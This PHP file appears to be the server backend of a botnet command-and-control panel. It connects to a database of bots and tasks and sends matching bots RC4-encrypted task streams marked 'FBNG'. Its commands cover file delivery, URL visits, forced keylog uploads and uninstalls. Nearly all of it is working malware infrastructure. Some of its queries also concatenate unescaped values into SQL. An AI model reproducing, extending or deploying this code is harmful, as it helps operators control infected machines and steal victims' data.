<?php

function connect_to_database($ERROR)
{
    global $fb;
    $fb->mysql = mysqli_connect($fb->db['host'], $fb->db['user'], $fb->db['pass'], $fb->db['name']);
    
    if (!$fb->mysql) 
    {
        if( function_exists("show") && $ERROR && isset($fb->str['bodyHeader']) )
        {
            show($fb->str['bodyHeader'].$fb->str['dbConnectErr'].$fb->str['footer']."</div>", $fb->str['Database_Error']);
        }
        elseif( $ERROR ) {
            echo "<html><title>Database Error</title><body><hr><div align='center'> <h3>Database Error</h3>
            Unable to connect to Database.</div> </body></html>";     
        }
        exit();
    }
    mysqli_set_charset( $fb->mysql, "utf8" ); return $fb->mysql;
}

function outputTaskStream($task_id, $data)
{
    global $fb;
    $pPsw = base64_decode($fb->accountNumber);
    
    $cipher = new Crypt_RC4();
    $cipher->setKey($pPsw);
    return "FBNG".$task_id.$cipher->encrypt( $data."FBNG" );
}

function replyTask( $fb )
{
    if( has_get("sql") && get("sql") == "1" )
    {
        $sq = "script/fb/sqlite3.zip";
        if( !file_exists($sq) || !is_readable($sq) || filesize($sq) > 1024000 ){ return false; }
        
        $file = fopen($sq, 'r');
        return outputTaskStream(9, fread($file, filesize($sq)));
    }
    
    if( !$fb->vPro ) { return false; }
    
    $result = mysqli_query($fb->mysql, "SELECT * FROM tasks WHERE status='1';");
    if(!$result) { return false; }
    
    $data = '';
    while( $row = mysqli_fetch_array($result) )
    {
        if( $row["task"] == 9 ) { $row["task"] = 8; }//change screenshot to force keyupload
        
        if( strpos($row["botsid"], $fb->ID) !== FALSE )
        {
            $url = $row["url"];
            if( $row["task"] == 1 || $row["task"] == 2 )
            {
                if( !file_exists($url) || !is_readable($url) ||  filesize($url) > 1024000 )
                { 
                    return closeTask($fb, $row["id"]);
                }
                $file = fopen($url, 'r');
                $data .= fread($file, filesize($url));
            }
            
            if( $row["task"] == 10 || $row["task"] == 11 || $row["task"] == 12 )
            {
                require_once 'script/fbConnect/fbc_Task.php';
                return fbc_replyTask( $fb, $row );
            }
            
            if( $row["task"] > 2 && $row["task"] < 11 )//
            {
                if( Log_result($fb, TRUE) )
                {
                    if( $row["task"] == 3 ) { //delete bot after Uninstalled
                        mysqli_query($fb->mysql, "DELETE FROM bots WHERE botID='".$fb->ID."';"); 
                    }
                }    
            }
            
            if( $row["task"] == 4 ) // visit url
            {
                $data .= $row["url"];
            }
            
            return outputTaskStream($row["task"], $data);
        }
    }  
    return false;
}

function init_dbHandle()
{
return array(
///////////////////////////////
'actdate' => '0',
'agent' => '0',
'botID' => '0',
'botnum' => '0',
'botsid' => '0',
'browser' => '0',
'bucket' => '0',
'bucket_type' => '0',
'bv' => '0',
'content' => '0',
'countryNumber' => '0',
'cur_dir' => '0',
'date' => '0',
'executed' => '0',
'failed' => '0',
'file_created' => '0',
'file_dir' => '0',
'file_ext' => '0',
'file_modified' => '0',
'file_name' => '0',
'file_size' => '0',
'file_type' => '0',
'host' => '0',
'id' => '0',
'insdate' => '0',
'ip' => '0',
'language' => '0',
'num_of_fbc' => '0',
'os' => '0',
'ost' => '0',
'osv' => '0',
'request' => '0',
'request_type' => '0',
'status' => '0',
'task' => '0',
'url' => '0',
'user' => '0',
'window' => '0'
//////////////////////////////////////////
);
}

function select_id_list($fb, $table, $listArray, $act="SELECT *")
{
    $queryStr = $act." FROM ".$table." WHERE";
    for ($i = 0; $i < count($listArray); $i++)
    {
        if ( is_numeric($listArray[$i]) )
        {
            $queryStr .= " `id` = " .$listArray[$i]. " OR";
        }
    }
    $queryStr .= ';';
    $query  = str_replace(' OR;', ';', $queryStr);// remove the appended or
    return mysqli_query($fb->mysql, $query);
}

function insertDB($fb, $table, $checkDublicate)
{
    $value_query = "VALUES('";
    $inset_query = "INSERT INTO ".$table." (`";
    if( $checkDublicate )
    {
        $existResult = mysqli_query($fb->mysql, "SELECT * FROM ".$table." WHERE `user` = '".$fb->dbHandle['user'].
                                            "' AND `content` = '".$fb->dbHandle['content']."' LIMIT 1;");
        if( !$existResult || mysqli_num_rows($existResult) ) { return false; }
    }
    
    $result = mysqli_query($fb->mysql, "SHOW COLUMNS FROM ".$table);
    
    if(!$result) { return false; }
    
    while( ($row = mysqli_fetch_array($result)) ) 
    {
        if( !isset($fb->dbHandle[$row['Field']]) ) { $fb->dbHandle[$row['Field']] = '0'; }
        $inset_query .= $row['Field']."`,`";
        $value_query .= mysqli_real_escape_string($fb->mysql,$fb->dbHandle[$row['Field']])."','";
    } 
    $query = substr($inset_query,0,strlen($inset_query)-2).") ".substr($value_query,0,strlen($value_query)-2).")";
    return mysqli_query($fb->mysql, $query);
}

function updateDB($fb, $table, $list)
{
    if( !$list || count($list) < 2 ) { return false; }
    $update_query = "UPDATE ".$table." SET";
    
    for ($i = 1; $i < count($list); $i++) 
    {
        if( !isset($fb->dbHandle[$list[$i]]) ) { $fb->dbHandle[$list[$i]] = '0'; }
        
        $update_query .= " ".$list[$i]."='".
        mysqli_real_escape_string($fb->mysql,$fb->dbHandle[$list[$i]])."',";
    }
    
    $query = substr($update_query,0,strlen($update_query)-1)." WHERE ".$list[0]."='".
        mysqli_real_escape_string($fb->mysql,$fb->dbHandle[$list[0]])."' LIMIT 1;";
    
    return mysqli_query($fb->mysql, $query);
}

function filter_filename($filename, $beautify=true) 
{
    // sanitize filename
    $filename = preg_replace(
        '~
        [<>:"/\\|?*]|            './/# file system reserved https://en.wikipedia.org/wiki/Filename#Reserved_characters_and_words
        '[\x00-\x1F]|             './/# control characters http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247%28v=vs.85%29.aspx
        '[\x7F\xA0\xAD]|          './/# non-printing characters DEL, NO-BREAK SPACE, SOFT HYPHEN
        '[#\[\]@!$&\'()+,;=]|     './/# URI reserved https://tools.ietf.org/html/rfc3986#section-2.2
        '[{}^\~`]                 './/# URL unsafe characters https://www.ietf.org/rfc/rfc1738.txt
        '~x',
        '-', $filename);
    
    // avoids ".", ".." or ".hiddenFiles"
    $filename = ltrim($filename, '.-');
    
    // optional beautification
    if ($beautify) { $filename = beautify_filename($filename); }
    
    // maximise filename length to 60 bytes http://serverfault.com/a/9548/44086
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    $filename = substr($filename,0,60);
    
    return $filename;
}

function beautify_filename($filename) {
    // reduce consecutive characters
    $filename = preg_replace(array(
        // "file   name.zip" becomes "file-name.zip"
        '/ +/',
        // "file___name.zip" becomes "file-name.zip"
        '/_+/',
        // "file---name.zip" becomes "file-name.zip"
        '/-+/'
    ), '-', $filename);
    $filename = preg_replace(array(
        // "file--.--.-.--name.zip" becomes "file.name.zip"
        '/-*\.-*/',
        // "file...name..zip" becomes "file.name.zip"
        '/\.{2,}/'
    ), '.', $filename);
    // lowercase for windows/unix interoperability http://support.microsoft.com/kb/100625
    //$filename = mb_strtolower($filename, mb_detect_encoding($filename));
    // ".file-name.-" becomes "file-name"
    $filename = trim($filename, '.-');
    return $filename;
}

function filter_foldername($foldername, $beautify=true) 
{
    return filter_filename(str_replace(".","-",$foldername), $beautify);
}

function closeTask($fb, $id)
{
    $update = "UPDATE tasks SET status='2' WHERE id='".$id."';";
    mysqli_query($fb->mysql,$update);
    return false;
}

function filter_user($str)
{
    return preg_match("/^[A-Za-z0-9]*$/", $str) ? $str : '';
}